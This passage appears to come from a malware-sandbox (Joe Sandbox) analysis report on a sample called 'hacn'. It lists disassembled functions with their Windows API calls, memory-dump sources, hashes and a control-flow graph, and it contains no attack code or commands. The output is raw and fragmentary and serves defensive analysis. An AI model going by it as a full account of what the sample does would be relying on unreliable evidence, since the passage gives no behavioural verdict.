                                                                                                                                          • Opcode Fuzzy Hash: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
                                                                                                                                          • Instruction Fuzzy Hash: F2210531A08E4281DB549B69F54416AE3A0FF86BF4F100235EAAD83BE8EF6DE4458750
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00007FF61D328660: GetCurrentProcess.KERNEL32 ref: 00007FF61D328680
                                                                                                                                            • Part of subcall function 00007FF61D328660: OpenProcessToken.ADVAPI32 ref: 00007FF61D328691
                                                                                                                                            • Part of subcall function 00007FF61D328660: GetTokenInformation.KERNELBASE ref: 00007FF61D3286B6
                                                                                                                                            • Part of subcall function 00007FF61D328660: GetLastError.KERNEL32 ref: 00007FF61D3286C0
                                                                                                                                            • Part of subcall function 00007FF61D328660: GetTokenInformation.KERNELBASE ref: 00007FF61D328700
                                                                                                                                            • Part of subcall function 00007FF61D328660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF61D32871C
                                                                                                                                            • Part of subcall function 00007FF61D328660: CloseHandle.KERNEL32 ref: 00007FF61D328734
                                                                                                                                          • LocalFree.KERNEL32(00000000,00007FF61D323B6E), ref: 00007FF61D328A0C
                                                                                                                                          • LocalFree.KERNEL32 ref: 00007FF61D328A15
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                          • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                          • API String ID: 6828938-1817031585
                                                                                                                                          • Opcode ID: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                                                                                          • Instruction ID: fae47597bb91079dd08e1825b0bd32176e4e30ffead05cc83ad8c7e0ab3a4a3a
                                                                                                                                          • Opcode Fuzzy Hash: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
                                                                                                                                          • Instruction Fuzzy Hash: CB216D31E08E8681F654AB34E8456EAA261AF56BA4F840131F94DD3696EF3CE5458280
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 925 7ff61d33d620-7ff61d33d645 926 7ff61d33d64b-7ff61d33d64e 925->926 927 7ff61d33d913 925->927 929 7ff61d33d687-7ff61d33d6b3 926->929 930 7ff61d33d650-7ff61d33d682 call 7ff61d33aed8 926->930 928 7ff61d33d915-7ff61d33d925 927->928 931 7ff61d33d6be-7ff61d33d6c4 929->931 932 7ff61d33d6b5-7ff61d33d6bc 929->932 930->928 934 7ff61d33d6c6-7ff61d33d6cf call 7ff61d33c9e0 931->934 935 7ff61d33d6d4-7ff61d33d6e9 call 7ff61d34408c 931->935 932->930 932->931 934->935 940 7ff61d33d6ef-7ff61d33d6f8 935->940 941 7ff61d33d803-7ff61d33d80c 935->941 940->941 944 7ff61d33d6fe-7ff61d33d702 940->944 942 7ff61d33d860-7ff61d33d885 WriteFile 941->942 943 7ff61d33d80e-7ff61d33d814 941->943 945 7ff61d33d887-7ff61d33d88d GetLastError 942->945 946 7ff61d33d890 942->946 947 7ff61d33d816-7ff61d33d819 943->947 948 7ff61d33d84c-7ff61d33d85e call 7ff61d33d0d8 943->948 949 7ff61d33d704-7ff61d33d70c call 7ff61d334a00 944->949 950 7ff61d33d713-7ff61d33d71e 944->950 945->946 952 7ff61d33d893 946->952 953 7ff61d33d838-7ff61d33d84a call 7ff61d33d2f8 947->953 954 7ff61d33d81b-7ff61d33d81e 947->954 968 7ff61d33d7f0-7ff61d33d7f7 948->968 949->950 956 7ff61d33d720-7ff61d33d729 950->956 957 7ff61d33d72f-7ff61d33d744 GetConsoleMode 950->957 961 7ff61d33d898 952->961 953->968 962 7ff61d33d8a4-7ff61d33d8ae 954->962 963 7ff61d33d824-7ff61d33d836 call 7ff61d33d1dc 954->963 956->941 956->957 958 7ff61d33d7fc 957->958 959 7ff61d33d74a-7ff61d33d750 957->959 958->941 966 7ff61d33d7d9-7ff61d33d7eb call 7ff61d33cc60 959->966 967 7ff61d33d756-7ff61d33d759 959->967 969 7ff61d33d89d 961->969 970 7ff61d33d90c-7ff61d33d911 962->970 971 7ff61d33d8b0-7ff61d33d8b5 962->971 963->968 966->968 975 7ff61d33d75b-7ff61d33d75e 967->975 976 7ff61d33d764-7ff61d33d772 967->976 968->961 969->962 970->928 977 7ff61d33d8b7-7ff61d33d8ba 971->977 978 7ff61d33d8e3-7ff61d33d8ed 971->978 975->969 975->976 982 7ff61d33d7d0-7ff61d33d7d4 976->982 983 7ff61d33d774 976->983 984 7ff61d33d8bc-7ff61d33d8cb 977->984 985 7ff61d33d8d3-7ff61d33d8de call 7ff61d335580 977->985 980 7ff61d33d8ef-7ff61d33d8f2 978->980 981 7ff61d33d8f4-7ff61d33d903 978->981 980->927 980->981 981->970 982->952 986 7ff61d33d778-7ff61d33d78f call 7ff61d344158 983->986 984->985 985->978 991 7ff61d33d7c7-7ff61d33d7cd GetLastError 986->991 992 7ff61d33d791-7ff61d33d79d 986->992 991->982 993 7ff61d33d7bc-7ff61d33d7c3 992->993 994 7ff61d33d79f-7ff61d33d7b1 call 7ff61d344158 992->994 993->982 996 7ff61d33d7c5 993->996 994->991 998 7ff61d33d7b3-7ff61d33d7ba 994->998 996->986 998->993
                                                                                                                                          APIs
                                                                                                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF61D33D60B), ref: 00007FF61D33D73C
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF61D33D60B), ref: 00007FF61D33D7C7
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ConsoleErrorLastMode
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 953036326-0
                                                                                                                                          • Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                                                                          • Instruction ID: 2a678f951b2cad6bfd127e949445bc6f8cd1f14624c9a0898d37f0a7849b48a6
                                                                                                                                          • Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
                                                                                                                                          • Instruction Fuzzy Hash: 9291D672F08E51A5F760CF69A5442BDABA0BB46FA8F144139DE4E97695EF3CE442C300
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _get_daylight$_isindst
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4170891091-0
                                                                                                                                          • Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                                                                          • Instruction ID: 535446636722555e6ada9848761f5ba6d9d658649edf51ace3aae2cfa01f9adf
                                                                                                                                          • Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
                                                                                                                                          • Instruction Fuzzy Hash: 7A51F973F04A119AFB14CF649A456BCA7A1AF12B78F944135ED1ED2AE5EF3CA442C700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1452418845-0
                                                                                                                                          • Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                                                                          • Instruction ID: be5b5a012e40f2066c07944174a06e0477b1025a5693501a81e50dd05013e44f
                                                                                                                                          • Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
                                                                                                                                          • Instruction Fuzzy Hash: 32314A31E0DE4341FA24ABF495123BAA2A19F53FA8F485435D94DC72D7FE2DA504C391
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1279662727-0
                                                                                                                                          • Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                                                                                          • Instruction ID: c76e368224cf7ea3ee2e2f0eeec5a834400b784b7387c792cf39ac27dbb2d5ed
                                                                                                                                          • Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
                                                                                                                                          • Instruction Fuzzy Hash: 4C416332E18B8193E754DB619610369A360FF96B74F109335E65C47AD5EF6CF5A08700
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                          • Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                                                                                          • Instruction ID: f9643b4a6d7fb7c5a14d97e0e5dcacf4e0b1eda3e32a90784609e2678f29ae59
                                                                                                                                          • Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
                                                                                                                                          • Instruction Fuzzy Hash: FBD09E30F08E0652EB5C6F715D5907992155F5AF21F105838D94B96393EE2EE84E8240
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: CreateDirectoryMessage
                                                                                                                                          • String ID: Security descriptor is not initialized!
                                                                                                                                          • API String ID: 73271072-986317556
                                                                                                                                          • Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                                                                          • Instruction ID: 7a0a3e103892b06449191f8317f9e63f5b32ed3ef1c6c734dea48a9973b095fc
                                                                                                                                          • Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
                                                                                                                                          • Instruction Fuzzy Hash: 84E012B6E18F0686EA209B24EC45269A390BB56B74F801334E55DD77E4FF7CD1198B40
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                          • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                                                                          • Instruction ID: 05ab3617115e65000a28784c2b18b4eed218cfca6792f6cbe86da07c8851362e
                                                                                                                                          • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                                                                                                          • Instruction Fuzzy Hash: C4510671B0DB6196FA28DE36960067AE281BF46FB4F144734DD6D877C5EE3CE5018A00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF61D33B099,?,?,00000000,00007FF61D33B14E), ref: 00007FF61D33B28A
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF61D33B099,?,?,00000000,00007FF61D33B14E), ref: 00007FF61D33B294
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1687624791-0
                                                                                                                                          • Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                                                                          • Instruction ID: e0c37269bbf2ebf0e28a1b1596b06a5c0afa5139443ad12b575898d0d4d510dd
                                                                                                                                          • Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
                                                                                                                                          • Instruction Fuzzy Hash: EA21A131B18E8261FAA8D761D69427DD2829F86FF0F044335EA6EC73D5FE6CA4458301
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                          • Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                                                                          • Instruction ID: 344def0ddc6864d62783524e5e48b7ceb5fe4f02aeb80100d98cd883193417c2
                                                                                                                                          • Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
                                                                                                                                          • Instruction Fuzzy Hash: 2D11BF72A08F8192EA10CB26A944069F361AB46FF4F540331EE7D8B7E9EF7CE1558740
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61D338039), ref: 00007FF61D3381DF
                                                                                                                                          • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61D338039), ref: 00007FF61D3381F5
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Time$System$FileLocalSpecific
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1707611234-0
                                                                                                                                          • Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                                                                                          • Instruction ID: 6270b3cfa92edeade1b26d8efdea743c8963be94fa7bbcfe4ddf71649bf56f47
                                                                                                                                          • Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
                                                                                                                                          • Instruction Fuzzy Hash: D3018E3291CA9186E7548F15A40123EF3B0FB82BB1F600235E6AD819D8EF7DD000CB00
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 588628887-0
                                                                                                                                          • Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                                                          • Instruction ID: 3d936ed92d4fafe7dd0139b3e78fa38dc0c8d5f94813bb938eab075dbe906363
                                                                                                                                          • Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
                                                                                                                                          • Instruction Fuzzy Hash: 4EE08C30F08E4292FF1CEBB2984503892919F8AF22F404434C81EC6292FF2CB8898A10
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DirectoryErrorLastRemove
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 377330604-0
                                                                                                                                          • Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                                                                          • Instruction ID: 3aa2a8958116cee7cf9cfdbbdb7b00ae17c2b4f2ae7c63a929299f926c3ce450
                                                                                                                                          • Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
                                                                                                                                          • Instruction Fuzzy Hash: 9ED01230F1DE0393FA1867711D8513991906F56F71F500670C02EC01D0FF2CB0C94211
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true
                                                                                                                                          • Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                          • Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
